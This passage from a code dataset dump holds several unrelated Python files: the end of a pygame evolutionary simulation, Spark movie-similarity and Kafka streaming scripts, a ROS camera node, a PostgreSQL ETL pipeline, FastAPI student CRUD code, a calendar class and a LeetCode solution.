\"Objekt\", i)\r\n frame = 0\r\n population = []\r\n hygroskopizität = []\r\n sum_laenge = 0\r\n while True: #game loop\r\n screen.fill((255,255,255))\r\n frame += 1\r\n \r\n #Simulation finished?\r\n if frame > zyklen*252:\r\n \r\n pop_nr = pop_nr + 1\r\n plot_animation(0)\r\n break\r\n # if pop_nr >= population_limit: \r\n # pygame.quit()\r\n # sys.exit()\r\n \r\n #X pressed?\r\n for event in pygame.event.get():\r\n if event.type == QUIT: #if X is clicked on the window\r\n pygame.quit() #stops pygame\r\n sys.exit() #stops the hole code\r\n \r\n \r\n #beginnning of simulation\r\n if frame == 1:\r\n startpopulation(populationsnum, i)\r\n print(\"Startpopulation\")\r\n print(population)\r\n \r\n boden(laenge, breite) \r\n #Für jedes Populationsmitglied\r\n for j in range(0,len(population)):\r\n draw(j, frame) \r\n \r\n \r\n \r\n pygame.display.update()\r\n clock.tick(fps_) #frame rate : 60 fps\r\n \r\n population2 = []\r\n population = []\r\n sel_reco_mut()\r\n if generation_nr+1 == generations:\r\n plot_animation(1)\r\n print(\"KONTROLLE:\", population2)\r\n #print(population2)\r\n #mit Exemplare von Population2 weitermachen!!!","repo_name":"GameMakerPremium/MA_Evolutionary_Algorithm","sub_path":"FINISHED_2.py","file_name":"FINISHED_2.py","file_ext":"py","file_size_in_byte":33003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3068149926","text":"import sys\r\nfrom pyspark import SparkConf, SparkContext\r\nfrom math import sqrt\r\nimport numpy as np\r\ndef loadMovieNames():\r\n movieNames = {}\r\n movieGenres = {}\r\n with open(\"./ml-100k/u.ITEM\", encoding='ascii', errors='ignore') as f:\r\n for line in f:\r\n fields = line.replace('\\n','').split('|')\r\n movieNames[int(fields[0])] = fields[1]\r\n genres = [ int(i) for i in fields[5:]]\r\n movieGenres[int(fields[0])] = genres\r\n return movieNames, movieGenres\r\n\r\n#Python 3 doesn't let you pass around unpacked tuples,\r\n#so we explicitly extract the ratings now.\r\ndef makePairs( userRatings ):\r\n ratings = userRatings[1]\r\n (movie1, rating1) = ratings[0]\r\n (movie2, rating2) = ratings[1]\r\n return ((movie1, movie2), (rating1, rating2))\r\n\r\ndef shared_genre(m1,m2):\r\n # print(m1)\r\n # print(m2)\r\n return bool(np.dot(m1,m2))\r\n\r\n\r\ndef filterDuplicates( userRatings ):\r\n ratings = userRatings[1]\r\n (movie1, rating1) = ratings[0]\r\n (movie2, rating2) = ratings[1]\r\n return movie1 < movie2\r\n\r\ndef computeCosineSimilarity(ratingPairs):\r\n numPairs = 0\r\n sum_xx = sum_yy = sum_xy = 0\r\n for ratingX, ratingY in ratingPairs:\r\n sum_xx += ratingX * ratingX\r\n sum_yy += ratingY * ratingY\r\n sum_xy += ratingX * ratingY\r\n numPairs += 1\r\n\r\n numerator = sum_xy\r\n denominator = sqrt(sum_xx) * sqrt(sum_yy)\r\n\r\n score = 0\r\n if (denominator):\r\n score = (numerator / (float(denominator)))\r\n\r\n return (score, numPairs)\r\n\r\n\r\nconf = SparkConf().setMaster(\"local[*]\").set(\"spark.driver.host\",'localhost').setAppName(\"MovieSimilarities\")\r\nsc = SparkContext(conf = conf)\r\n\r\nprint(\"\\nLoading movie names...\")\r\nnameDict, genre_dict = loadMovieNames()\r\n# print(genre_dict)\r\ndata = sc.textFile(\"./ml-100k/u.data\")\r\n\r\n\r\n# Map ratings to key / value pairs: user ID => movie ID, rating\r\nratings = data.map(lambda l: l.split()).map(lambda l: (int(l[0]), (int(l[1]), float(l[2]))))\r\n\r\n# r = ratings.take(10)\r\n# for rating in r:\r\n# print(rating)\r\n\r\n#Convert to average centered ratings\r\nonly_ratings = ratings.map(lambda l: 
(l[1][0], l[1][1]))\r\nonly_ratings = only_ratings.groupByKey().mapValues(lambda x: np.sum([i for i in x])/len([i for i in x]))\r\n# orr = only_ratings.take(10)\r\n# print(orr)\r\n# exit()\r\nratings_dict = { i:j for i,j in only_ratings.collect()}\r\n# print('ratings dict:')\r\n# print(ratings_dict)\r\naverage_rating_dict = sc.broadcast(ratings_dict)\r\n\r\nratings = ratings.mapValues(lambda l: (l[0], l[1] - average_rating_dict.value[l[0]]))\r\n\r\n\r\ndef CosineSimilarityWithGenreScale(line):\r\n numPairs = 0\r\n sum_xx = sum_yy = sum_xy = 0\r\n movie1 = line[0][0]\r\n movie2 = line[0][1]\r\n ratingPairs = line[1]\r\n for ratingX, ratingY in ratingPairs:\r\n sum_xx += ratingX * ratingX\r\n sum_yy += ratingY * ratingY\r\n sum_xy += ratingX * ratingY\r\n numPairs += 1\r\n\r\n numerator = sum_xy\r\n denominator = sqrt(sum_xx) * sqrt(sum_yy)\r\n genre_metric = np.dot(genre_dict[movie1],genre_dict[movie2])/(np.sum(genre_dict[movie1]) + np.sum(genre_dict[movie2]))\r\n\r\n score = 0\r\n if (denominator):\r\n score = genre_metric * (numerator / (float(denominator)))\r\n\r\n return ((movie1,movie2),(score, numPairs))\r\n\r\ndef CosineSimilarityWithCoRatings(line):\r\n numPairs = 0\r\n sum_xx = sum_yy = sum_xy = 0\r\n movie1 = line[0][0]\r\n movie2 = line[0][1]\r\n ratingPairs = line[1]\r\n for ratingX, ratingY in ratingPairs:\r\n sum_xx += ratingX * ratingX\r\n sum_yy += ratingY * ratingY\r\n sum_xy += ratingX * ratingY\r\n numPairs += 1\r\n\r\n numerator = sum_xy\r\n denominator = sqrt(sum_xx) * sqrt(sum_yy)\r\n ratings_metric = np.log(len([i for i in ratingPairs])/10)\r\n score = 0\r\n if (denominator):\r\n score = ratings_metric * (numerator / (float(denominator)))\r\n\r\n return ((movie1,movie2),(score, numPairs))\r\n\r\n# Emit every movie rated together by the same user.\r\n# Self-join to find every combination.\r\njoinedRatings = ratings.join(ratings)\r\n\r\n# At this point our RDD consists of userID => ((movieID, rating), (movieID, rating))\r\n\r\n# Filter out duplicate pairs\r\nuniqueJoinedRatings = joinedRatings.filter(filterDuplicates)\r\n\r\n# Now key by (movie1, movie2) pairs.\r\nmoviePairs = uniqueJoinedRatings.map(makePairs)\r\n\r\n# We now have (movie1, movie2) => (rating1, rating2)\r\n# Now collect all ratings for each movie pair and compute similarity\r\nmoviePairRatings = moviePairs.groupByKey()\r\n\r\n# We now have (movie1, movie2) = > (rating1, rating2), (rating1, rating2) ...\r\n# Can now compute similarities.\r\n# moviePairSimilarities = moviePairRatings.mapValues(computeCosineSimilarity).cache()\r\n# print(moviePairRatings.take(10))\r\n# exit()\r\nmoviePairSimilarities = moviePairRatings.map(CosineSimilarityWithCoRatings).cache()\r\n\r\n# Save the results if desired\r\n#moviePairSimilarities.sortByKey()\r\n#moviePairSimilarities.saveAsTextFile(\"movie-sims\")\r\n\r\ndef result_filter(pairSim):\r\n t1 = (pairSim[0][0] == movieID)\r\n t2 = (pairSim[0][1] == movieID)\r\n t11 = False\r\n if(t1):\r\n t11 = shared_genre(genre_dict[pairSim[0][1]],genre_dict[movieID])\r\n if(t2):\r\n t11 = shared_genre(genre_dict[pairSim[0][0]],genre_dict[movieID])\r\n\r\n t3 = pairSim[1][0] > scoreThreshold \r\n t4 = pairSim[1][1] > coOccurenceThreshold\r\n #Average rating threshold\r\n t5 = average_rating_dict.value[movieID] > average_rating_threshold\r\n #At least one shared genre threshold\r\n if((t1 or t2) and t11 and t3 and t4 and t5):\r\n return True\r\n\r\n return False\r\n# Extract similarities for the movie we care about that are \"good\".\r\nif (len(sys.argv) > 1):\r\n\r\n scoreThreshold 
= 0.01\r\n coOccurenceThreshold = 25\r\n average_rating_threshold = 2\r\n movieID = int(sys.argv[1])\r\n\r\n # Filter for movies with this sim that are \"good\" as defined by\r\n # our quality thresholds above\r\n # filteredResults = moviePairSimilarities.filter(lambda pairSim: \\\r\n # (pairSim[0][0] == movieID or pairSim[0][1] == movieID) \\\r\n # and pairSim[1][0] > scoreThreshold and pairSim[1][1] > coOccurenceThreshold)\r\n\r\n filteredResults = moviePairSimilarities.filter(result_filter) \r\n\r\n # Sort by quality score.\r\n results = filteredResults.map(lambda pairSim: (pairSim[1], pairSim[0])).sortByKey(ascending = False).take(10)\r\n\r\n print(\"Top 10 similar movies for \" + nameDict[movieID])\r\n # print(genre_dict[movieID])\r\n for result in results:\r\n (sim, pair) = result\r\n # Display the similarity result that isn't the movie we're looking at\r\n similarMovieID = pair[0]\r\n if (similarMovieID == movieID):\r\n similarMovieID = pair[1]\r\n print(nameDict[similarMovieID] + \"\\tscore: \" + str(sim[0]) + \"\\tstrength: \" + str(sim[1]))\r\n # print(genre_dict[similarMovieID])\r\n","repo_name":"rajkshah3/spark","sub_path":"spark_course/movie-similarities-pearson.py","file_name":"movie-similarities-pearson.py","file_ext":"py","file_size_in_byte":6827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16127865724","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport roslib\nroslib.load_manifest('teleoperation')\nimport sys\nimport rospy\nimport cv2\nimport numpy as np\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import CompressedImage\nfrom sensor_msgs.msg import Joy\n\nclass image_converter:\n def __init__(self):\n self.image_pub = rospy.Publisher(\"image_topic_2\", CompressedImage)\n self.image_sub = rospy.Subscriber(\"/usb_cam/image_raw/compressed\", CompressedImage, self.callback, queue_size = 1)\n self.joy_sub = rospy.Subscriber(\"/joy\", Joy ,self.joyCallback)\n self.black_screen = True\n\n def callback(self, data):\n np_arr = np.fromstring(data.data, np.uint8)\n image_np = cv2.imdecode(np_arr, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n image_height, image_width = image_np.shape[:2]\n # Crop image\n image_np = image_np[0.5*image_height-120:0.5*image_height+150, 0.5*image_width-160:0.5*image_width+160]\n\n # Enable fullscreen\n cv2.namedWindow(\"test\", cv2.WND_PROP_FULLSCREEN) \n cv2.setWindowProperty(\"test\", cv2.WND_PROP_FULLSCREEN, cv2.cv.CV_WINDOW_FULLSCREEN)\n\n # Draw lines\n image_height, image_width = image_np.shape[:2]\n center_x = int(0.5*image_width)\n center_y = int(0.5*image_height)\n '''\n cv2.circle(image_np, \n center = (center_x, center_y), \n radius = 10, \n color = 0, \n thickness = 5) \n '''\n cv2.line(image_np, (center_x, center_y+10), (center_x, center_y-10), color = 255)\n cv2.line(image_np, (center_x+10, center_y), (center_x-10, center_y), color = 255)\n #cv2.rectangle(image_np, (center_x-140, center_y-120), (center_x+140, center_y+120), color = 255, thickness = 1)\n cv2.rectangle(image_np, (center_x-60, center_y-60), (center_x+60, center_y+60), color = 255, thickness = 1)\n \n\n if (self.black_screen):\n image_np = np.zeros_like(image_np)\n cv2.imshow(\"test\", image_np)\n cv2.waitKey(3)\n\n # Create compressedImage #\n msg = CompressedImage()\n msg.header.stamp = rospy.Time.now()\n msg.format = \"jpeg\"\n msg.data = np.array(cv2.imencode('.jpg', image_np)[1]).tostring()\n self.image_pub.publish(msg)\n \n def joyCallback(self, data):\n if(data.buttons[1]):\n 
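# toggle the privacy blackout; button index 1 is assumed here to correspond to the B button on a typical gamepad\n            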
self.black_screen = not(self.black_screen)\n            rospy.loginfo(self.black_screen)\n\ndef main(args):\n    ic = image_converter()\n    rospy.init_node('image_converter', anonymous=True)\n    try:\n        rospy.spin()\n    except KeyboardInterrupt:\n        print(\"Shutting down\")\n    cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n    main(sys.argv)\n","repo_name":"dmgongora/teleoperation","sub_path":"src/cvnode_simple.py","file_name":"cvnode_simple.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10123538244","text":"import psycopg2\nimport pandas as pd\nimport numpy as np\n\n# database and dwh configuration\nhostname = 'localhost'\ndatabase = 'beni_and_sons'\ndwh = 'data_warehous'\nusername = 'admin'\npwd = 'admin'\nport_id = 5432\n\n\n# extract data from the beni_and_sons database into dataframe objects\ndef extract():\n    conn = None\n    cur = None\n    try:\n        conn = psycopg2.connect(\n            host=hostname,\n            dbname=database,\n            user=username,\n            password=pwd,\n            port=port_id\n        )\n        cur = conn.cursor()\n        cur.execute(\"SELECT version();\")\n        record = cur.fetchone()\n        print(\"You are connected to - \", database, record, \"\\n\")\n        fact_df = create_df(cur,\n                            \"select recruiter.id as recruiter_id, applicant.id as applicant_id, \"\n                            \"recruiter.departmant_id \"\n                            \", applicant.application_date, recruitment.recruitment_date, bonus.bonus_amount FROM \"\n                            \"applicant FULL JOIN recruiter ON \"\n                            \"applicant.recruiter_id = recruiter.id FULL JOIN recruitment ON applicant.id = \"\n                            \"recruitment.applicant_id LEFT JOIN \"\n                            \"bonus ON bonus.month = CAST((SPLIT_PART(recruitment.recruitment_date::TEXT, '-', \"\n                            \"2))AS INTEGER) \")\n        fact_df['bonus_amount'] = fact_df['bonus_amount'].replace(np.nan, 0)\n        fact_df['recruitment_date'] = fact_df['recruitment_date'].astype(str)\n        fact_df['application_date'] = fact_df['application_date'].astype(str)\n        applicant_df = create_df(cur, \"select id, city, birth_date, family_status FROM applicant\")\n        departmant_df = create_df(cur, \"SELECT id, name FROM departmant\")\n        recruiter_df = create_df(cur, \"SELECT id, city, birth_date, family_status, base_salary FROM recruiter\")\n        load(fact_df, applicant_df, departmant_df, recruiter_df)\n\n    except Exception as error:\n        print(error)\n    finally:\n        if cur is not None:\n            cur.close()\n        if conn is not None:\n            conn.close()\n\n\ndef load(fact_df, applicant_df, departmant_df, recruiter_df):\n    conn = None\n    cur = None\n    try:\n        conn = psycopg2.connect(\n            host=hostname,\n            dbname=dwh,\n            user=username,\n            password=pwd,\n            port=port_id\n        )\n        cur = conn.cursor()\n        cur.execute(\"SELECT version();\")\n        record = cur.fetchone()\n        print(\"You are connected to - \", dwh, record, \"\\n\")\n\n        for row, data in applicant_df.iterrows():\n            [id, city, birth_date, family_status] = data.get([\"id\", \"city\", \"birth_date\", \"family_status\"])\n            # NB: keep the trailing space after SET, otherwise the concatenated f-strings produce \"SETcity\"\n            cur.execute(\n                f\"INSERT INTO dim_applicant (id, city, birth_date, family_status) VALUES ({id}, '{city}',\"\n                f\"'{birth_date}','{family_status}') ON CONFLICT ON CONSTRAINT dim_applicant_pkey DO UPDATE SET \"\n                f\"city='{city}', birth_date ='{birth_date}', family_status = '{family_status}' \")\n            print(cur.statusmessage)\n            print(cur.query)\n            conn.commit()\n\n        for row, data in recruiter_df.iterrows():\n            [id, city, birth_date, family_status, base_salary] = data.get(\n                [\"id\", \"city\", \"birth_date\", \"family_status\", \"base_salary\"])\n            cur.execute(\n                f\"INSERT INTO dim_recruiter (id, city, birth_date, family_status, base_salary) VALUES\"
f\"({id}, '{city}', '{birth_date}', '{family_status}', {base_salary})\"\n f\"ON CONFLICT ON CONSTRAINT dim_recruiter_pkey DO UPDATE SET city='{city}',\"\n f\"birth_date ='{birth_date}', family_status = '{family_status}' , base_salary = {base_salary}\")\n print(cur.statusmessage)\n print(cur.query)\n conn.commit()\n\n for row, data in departmant_df.iterrows():\n [id, name] = data.get([\"id\", \"name\"])\n cur.execute(\n f\"INSERT INTO dim_departmant (id, name) VALUES ({id}, '{name}') ON CONFLICT ON CONSTRAINT \"\n f\"dim_departmant_pkey DO NOTHING\")\n print(cur.statusmessage)\n print(cur.query)\n conn.commit()\n\n for row, data in fact_df.iterrows():\n print(data)\n cur.execute(\n f\"INSERT INTO recruitment_process_fact (recruiter_id, applicant_id, department_id, application_date, \"\n f\"status, recruitment_date, bonus) VALUES ({data[0]}, {data[1]}, {data[2]}, '{data[3]}',\"\n f\"{False if data[4] == 'None' else True}, '{data[4]}',{data[5]}) ON CONFLICT ON CONSTRAINT \"\n f\"recruitment_process_fact_pkey DO UPDATE SET recruiter_id = {data[0]}, department_id={data[2]}, \"\n f\"application_date='{data[3]}', status={False if data[4] == 'None' else True}, recruitment_date='\"\n f\"{data[4]}', bonus={data[5]}\")\n print(cur.statusmessage)\n print(cur.query)\n conn.commit()\n\n except Exception as error:\n print(error)\n finally:\n if cur is not None:\n cur.close()\n if conn is not None:\n conn.close()\n\n\ndef create_df(cur, query):\n cur.execute(query)\n data = cur.fetchall()\n cols = []\n for elt in cur.description:\n cols.append(elt[0])\n return pd.DataFrame(data=data, columns=cols)\n\n\nextract()\n","repo_name":"flAdar/Beni_and_sons_test","sub_path":"ETL_Pipeline.py","file_name":"ETL_Pipeline.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16749602907","text":"from sqlalchemy.orm import Session\nfrom .. import models, schemas,database\nfrom fastapi import HTTPException,status\nfrom . import address\nfrom .. 
utils import list_address_utils,student_List_Utils\n# from ..hashing import Hash\n\n\ndatabases = database.database\n\ndef get_all_students(db: Session,limit:int = 100,skip :int = 0):\n    students = db.query(models.Student).offset(skip).limit(limit).all()\n    student_list = []\n    for student in students:\n        address_list=list_address_utils(student.id,db)\n        student_list.append(student_List_Utils(student,address_list))\n    return student_list\n\ndef create(request: schemas.ShowStudent,db:Session):\n    new_student = models.Student(\n        student_name = request.student_name,\n        student_class = request.student_class,\n        student_session = request.student_session\n    )\n    db.add(new_student)\n    db.commit()\n    db.refresh(new_student)\n    if new_student:\n        if address.create(new_student.id, request.addresses,db):\n            return True\n    return False\n\ndef get_student_by_id(id:int,db:Session):\n    student = db.query(models.Student).filter(models.Student.id == id).first()\n    # check for a missing row before dereferencing it, otherwise student.id raises AttributeError\n    if not student:\n        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n                            detail=f\"Student with the id {id} is not available\")\n    address_list=list_address_utils(student.id,db)\n    student_detail=student_List_Utils(student,address_list)\n    return student_detail\n\ndef destroy(id:int,db: Session):\n    student = db.query(models.Student).filter(models.Student.id == id)\n    addresses = db.query(models.Address).filter(models.Address.s_id == id)\n    for add in addresses:\n        address.destroy(add.id,db)\n    student.delete(synchronize_session=False)\n    db.commit()\n    return True\n\n\ndef update(id:int,request:schemas.StudentBase, db:Session):\n    student = db.query(models.Student).filter(models.Student.id == id)\n    if not student:\n        raise HTTPException(status_code=404, detail=f\"Student with {id} not found\")\n    update_data = {\n        \"student_name\" : request.student_name,\n        \"student_class\" : request.student_class,\n        \"student_session\" : request.student_session\n    }\n    student.update(update_data)\n    db.commit()\n    if student:\n        if address.update(id, request.addresses,db):\n            return True\n    return False\n","repo_name":"CpAswanthMG/MG-Student-Project","sub_path":"api/repository/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"38102763722","text":"# a module is simply another Python file whose functions can be imported where needed\r\n# here we created a separate Calc file and import everything from it for use below\r\nfrom Calc import *\r\na=1\r\nb=2\r\nx=sum(a,b)\r\ny=sub(a,b)\r\nz=mul(a,b)\r\nc=div(a,b)\r\nprint(x,y,z,c)","repo_name":"sagar-demo/Python","sub_path":"Module1.py","file_name":"Module1.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3432166103","text":"from datetime import date\nimport calendar\n\n# needed to pass test - test_show_Monthly_Calender\ncalendar.setfirstweekday(6)\n\nimport numpy as np\nfrom copy import deepcopy\n\n\nclass Calender(object):\n\n    def __init__(self):\n        self.year = None\n        self.month = None\n        self.day = None\n        self.today_WeekDay = None\n        self.events = []\n        self.reccuringEvents = []\n        self.setToday()\n\n    def setToday(self):\n        the_date = date.today()\n        today = str(the_date) # e.g. 
'2015-01-01' => numbers = [2015, 1, 1]\n        numbers = [int(n) for n in today.split('-')]\n        self.setCurrentYearMonthDay(numbers)\n        self.today_WeekDay = calendar.day_name[the_date.weekday()]\n\n    def setCurrentYearMonthDay(self, numbers):\n        self.year = numbers[0]\n        self.month = numbers[1]\n        self.day = numbers[2]\n\n    def getToday(self):\n        the_date_for_today = {\n            \"month\": self.month,\n            \"day\": self.day,\n            \"year\": self.year\n        }\n        return the_date_for_today\n\n    def daysThisMonth(self, month, year):\n        if month == 12:\n            return (date(year+1, 1, 1) - date(year, month, 1)).days\n        else:\n            return (date(year, month+1, 1) - date(year, month, 1)).days\n\n    def convertDayToWeekDayName(self, day, month, year):\n        the_date = date(year, month, day)\n        return calendar.day_name[the_date.weekday()]\n\n    def startAndEndOfMonth(self, month, year):\n        start = self.convertDayToWeekDayName(1, month, year)\n        lastDay = self.daysThisMonth(month, year)\n        end = self.convertDayToWeekDayName(lastDay, month, year)\n        return start, end\n\n    def howManyRowsForMonth(self, month, year):\n        start_date_name, end_date_name = self.startAndEndOfMonth(month, year)\n        days = self.daysThisMonth(month, year)\n        amount = days // 7  # integer division: the result is later passed to range()\n\n        if end_date_name == \"Sunday\":\n            return amount + 2\n        return amount + 1\n\n    def showMonth(self, year, month):\n        calendar.setfirstweekday(6)\n        return calendar.monthcalendar(year, month)\n\n    def dayNameToNumber(self, dayName):\n        days = {\"Sunday\": 1, \"Monday\": 2, \"Tuesday\": 3, \"Wednesday\": 4,\n                \"Thursday\": 5, \"Friday\": 6, \"Saturday\": 7\n                }\n\n        return days[dayName]\n\n    def getNumOfWeeks_startWeekday_endWeekday_TotaldaysOf(self, month, year):\n        number_of_weeks = self.howManyRowsForMonth(month, year)\n        start, end = self.startAndEndOfMonth(month, year)\n        total_Days = self.daysThisMonth(month, year)\n        return number_of_weeks, start, end, total_Days\n\n    def setUpWeek(self):\n        week_Json = {\"Sunday\": {}, \"Monday\": {},\n                     \"Tuesday\": {},\n                     \"Wednesday\": {}, \"Thursday\": {}, \"Friday\": {},\n                     \"Saturday\": {}\n                     }\n        week_list = ['Sunday', \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\",\n                     \"Friday\", \"Saturday\"\n                     ]\n        weekNumber = 1\n        count = 1\n        return week_Json, week_list, weekNumber, count\n\n    def buildMonthlyCalender(self, month, year):\n        if month > 12 or month < 1:\n            return None\n\n        number_of_weeks, start, end, total_Days = \\\n            self.getNumOfWeeks_startWeekday_endWeekday_TotaldaysOf(month, year)\n        week_Json, week_list, weekNumber, count = self.setUpWeek()\n\n        neededInfo = [number_of_weeks, weekNumber,\n                      week_list, start, count, total_Days]\n        return self.buildingTheDictionayOfMonthlyCal(neededInfo)\n\n    def buildingTheDictionayOfMonthlyCal(self, neededInfo):\n        number_of_weeks = neededInfo[0]\n        weekNumber = neededInfo[1]\n        week_list = neededInfo[2]\n        start = neededInfo[3]\n        count = neededInfo[4]\n        total_Days = neededInfo[5]\n\n        monthlyCalender = {}\n        for x in range(number_of_weeks):\n            monthlyCalender[weekNumber] = {}\n            for day in week_list:\n                if weekNumber == 1:\n                    if self.dayNameToNumber(day) >= \\\n                            self.dayNameToNumber(start):\n                        monthlyCalender[weekNumber][day] = {'date': count}\n                        count = count + 1\n                    else:\n                        monthlyCalender[weekNumber][day] = {'date': 0}\n                else:\n                    if count > total_Days:\n                        monthlyCalender[weekNumber][day] = {'date': 0}\n                    else:\n                        monthlyCalender[weekNumber][day] = {'date': count}\n                        count += 1\n            weekNumber += 1\n        return monthlyCalender\n\n    def addEventToCalender(self, month, day, year, event):\n        stringDate = \"{}-{}-{}\".format(month, day, year)\n        event['date'] = stringDate\n        
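# events are keyed by a month-day-year string; eventsForDay rebuilds the same key for lookups\n        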
self.events.append(event)\n\n def eventsForDay(self, month, day, year):\n stringDate = \"{}-{}-{}\".format(month, day, year)\n\n allEvents = {'events': {}}\n COUNT = 1\n for item in self.events:\n if item['date'] == stringDate:\n eventNumber = COUNT\n allEvents['events'][eventNumber] = item\n COUNT = COUNT + 1\n\n if allEvents == {'events': {}}:\n return None\n else:\n return allEvents\n\n def get_week_of_month(self, year, month, day):\n x = np.array(calendar.monthcalendar(year, month))\n week_of_month = np.where(x == day)[0][0] + 1\n return week_of_month\n\n def addReccuringEventToCalender(self, dayOfWeek, howOften, eventToAdd):\n eventToAdd['dayOfweek'] = dayOfWeek\n eventToAdd['occurrence'] = howOften\n self.reccuringEvents.append(eventToAdd)\n\n def reccuringEventsForMonth(self, month, year, monthlyCall=None):\n self.month = month\n self.year = year\n days = calendar.monthrange(year, month)\n if monthlyCall is None:\n hold = []\n\n for event in self.reccuringEvents:\n dayOfweek = event['dayOfweek']\n howManyTimesDayOfWeekIsInMonth, theDaysThatMatch = \\\n self.numberOfTimesDayisInMOnth(days, dayOfweek)\n\n for weekNumber in range(howManyTimesDayOfWeekIsInMonth):\n exactdate = theDaysThatMatch[weekNumber]\n eventCopy = deepcopy(event)\n del eventCopy['occurrence']\n del eventCopy['dayOfweek']\n\n eventCopy['date'] = '{}-{}-{}'.format(month, exactdate, year)\n if monthlyCall:\n monthlyCall[weekNumber+1][dayOfweek][1] = eventCopy\n else:\n hold.append(eventCopy)\n if monthlyCall is None:\n return hold\n else:\n return monthlyCall\n\n def showMonthCalender(self, month, year):\n monthlyCal = self.buildMonthlyCalender(month, year)\n for event in self.events:\n date = event['date']\n numbers = [int(n) for n in date.split('-')]\n event_date = {\"day\": numbers[1], \"month\": numbers[0],\n \"year\": numbers[2]\n }\n NameOfTheWeekDay = \\\n self.convertDayToWeekDayName(event_date['day'],\n event_date['month'],\n event_date['year'])\n weekNumberInMonth = self.get_week_of_month(event_date['year'],\n event_date['month'],\n event_date['day']\n )\n infoNeeded = [month, year, event_date, monthlyCal,\n NameOfTheWeekDay, weekNumberInMonth, event]\n monthlyCal = self.grabNonRecurringEvent(infoNeeded)\n\n if len(self.reccuringEvents) > 0:\n monthlyCal = self.addRecurringEvents(month, year, monthlyCal)\n\n return monthlyCal\n\n def grabNonRecurringEvent(self, infoNeeded):\n month = infoNeeded[0]\n year = infoNeeded[1]\n event_date = infoNeeded[2]\n monthlyCal = infoNeeded[3]\n NameOfTheWeekDay = infoNeeded[4]\n weekNumberInMonth = infoNeeded[5]\n event = infoNeeded[6]\n if event_date['month'] == month and event_date['year'] == year:\n # we Know we are on the same month and same year\n\n # check if event 1 exist\n if 1 in monthlyCal[weekNumberInMonth][NameOfTheWeekDay]:\n # if it does find how many events that have been created\n count = 0\n for idx in \\\n monthlyCal[weekNumberInMonth][NameOfTheWeekDay]:\n count += 1\n monthlyCal[weekNumberInMonth][NameOfTheWeekDay][count] = event\n else:\n # if it doent then we need to create it\n monthlyCal[weekNumberInMonth][NameOfTheWeekDay][1] = event\n return monthlyCal\n\n def numberOfTimesDayisInMOnth(self, days, dayOfweek):\n howManyTimesDayOfWeekIsInMonth = 0\n\n theDaysThatMatch = []\n for number in range(days[1]):\n dayNumber = (calendar.weekday(\n self.year, self.month, number+1)+1) % 7\n week = [\n 'Sunday', \"Monday\", \"Tuesday\", \"Wednesday\",\n \"Thursday\", \"Friday\", \"Saturday\"\n ]\n\n if week[dayNumber] == dayOfweek:\n 
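# collect every day of the month that falls on the requested weekday\n                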
theDaysThatMatch.append(number+1)\n                howManyTimesDayOfWeekIsInMonth += 1\n\n        return howManyTimesDayOfWeekIsInMonth, theDaysThatMatch\n\n    def addRecurringEvents(self, month, year, monthlyCal):\n        return self.reccuringEventsForMonth(month, year, monthlyCal)\n","repo_name":"payneal/Programming-Katas","sub_path":"Python_TDD_Katas/calendar/calender.py","file_name":"calender.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"20107855305","text":"import sys, os, re\nimport json\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils, OffsetRange, TopicAndPartition\n\n# process data every 10 seconds\nPERIOD=10\nBROKERS='localhost:9092'\nTOPIC='flight_delay_classification_request'\n\nconf = SparkConf().set(\"spark.default.parallelism\", 1)\n# sc = SparkContext(appName = \"Agile Data Science: PySpark Streaming 'Hello, World!'\", conf=conf)\n# NOTE: `sc` is expected to be provided by the pyspark shell; uncomment the line above to run this file standalone\nssc = StreamingContext(sc, PERIOD)\n\nstream = KafkaUtils.createDirectStream(\n    ssc,\n    [TOPIC],\n    {\n        \"metadata.broker.list\": BROKERS,\n        \"group.id\": \"0\",\n    }\n)\n\n# parse the JSON messages and print the resulting objects\nobject_stream = stream.map(lambda x: json.loads(x[1]))\nobject_stream.pprint()\n\nssc.start()\n","repo_name":"wikibook/agile-data-science","sub_path":"ch08/streaming_test.py","file_name":"streaming_test.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"30638347280","text":"\"\"\"\nSolution for 718. Maximum Length of Repeated Subarray\nhttps://leetcode.com/problems/maximum-length-of-repeated-subarray/\n\"\"\"\n\nclass Solution:\n    \"\"\"\n    Runtime: 2648 ms, faster than 76.33% of Python3 online submissions for Maximum Length of\n    Repeated Subarray.\n    Memory Usage: 38.3 MB, less than 66.49% of Python3 online submissions for Maximum Length of\n    Repeated Subarray.\n    \"\"\"\n    def findLength(self, A, B):\n        \"\"\"\n        Given two integer arrays A and B, return the maximum length of a subarray that appears in\n        both arrays.\n\n        Example 1:\n\n        Input:\n        A: [1,2,3,2,1]\n        B: [3,2,1,4,7]\n        Output: 3\n        Explanation:\n        The repeated subarray with maximum length is [3, 2, 1].\n\n        Args:\n            A: list to find common subarray from\n            B: list to find common subarray from\n\n        Returns:\n            int: the maximum length of the common array\n        \"\"\"\n        memo = [[0] * (len(B) + 1) for _ in range(len(A) + 1)]\n        for i in range(len(A) - 1, -1, -1):\n            for j in range(len(B) - 1, -1, -1):\n                if A[i] == B[j]:\n                    memo[i][j] = memo[i + 1][j + 1] + 1\n\n        return max(max(row) for row in 